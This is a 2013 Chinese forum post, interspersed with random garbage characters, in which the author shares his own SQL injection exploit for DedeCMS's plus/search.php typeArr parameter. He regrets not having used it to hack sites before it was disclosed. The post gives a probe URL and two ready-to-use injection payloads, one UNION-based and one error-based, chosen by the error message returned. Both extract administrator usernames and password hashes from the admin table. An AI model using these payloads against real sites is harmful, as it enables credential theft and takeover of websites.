转载不加作者名的没JJ
! K7 [0 G2 _0 z! L, \5 s. t$ {$ U. E3 j1 R8 ]
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。; h* L8 l* q3 a# _" g
/ l }& f u2 x. p) R: f既然已经发出来了,我就把我自己搞的exp发下吧。。唉。/ w' v$ R |9 c) L0 {
) r% I- x2 X$ Z1 F, y- \
我一般是这样测试的:
9 X( H/ t2 V1 U* ~1 G2 q( _9 c# p, k: `- ~8 L& T; A
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a$ V( `2 H7 ~% A& u& p6 ~9 ^
4 c1 [ B2 e& r+ @2 e
转载不加作者名的没JJ- J$ k* J1 J b* Z
% M- c+ s) z9 K3 F/ `% `
作者:鬼哥
# p5 A" Z* P3 O6 m1 F# e# Q3 l- Q) i
* P7 x1 {9 N/ O6 a- E! y$ j
4 M; T+ [+ e2 f2 H [
; O- r6 z& ^/ _9 g) K' N看结果如果提示" x$ \9 l6 s3 F7 V' B& C3 Q4 A
/ _8 `8 ~# e' E A4 j+ FSafe Alert: Request Error step 2 !# a o, q# ^7 i& R
1 |$ I1 C( Q7 A
那么直接用下面的exp9 p8 T# L( x- T' b, T, F( B
! Y4 j/ B2 O( V H3 N5 j( i
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a. B; J8 [6 ]: m3 u+ b( w8 Z
8 K% Z ~$ L" T% X! o9 U/ ~6 e8 v- T
C% T0 }- F* X8 R' V看结果如果提示7 Q2 Z. b& Q1 L2 ~
) N2 C+ @# _6 A0 E/ r4 k1 @# U' C
Safe Alert: Request Error step 1 !9 n! c. F+ \& l7 m
2 T4 H# ]8 n6 }5 o$ W
那么直接用下面的exp
9 K9 \% i; q3 m+ o3 R
' ^+ V/ @5 J, _5 ~xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a' _; v+ u+ r( P- j9 x( T7 v2 V
- h f4 b) K8 s. C
: j& C0 s! W2 j5 z" y1 `; ?如果正常显示证明漏洞不存在了。, p E, o6 J7 ]' s6 T
. A. O ~0 {- J. } ^& f
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对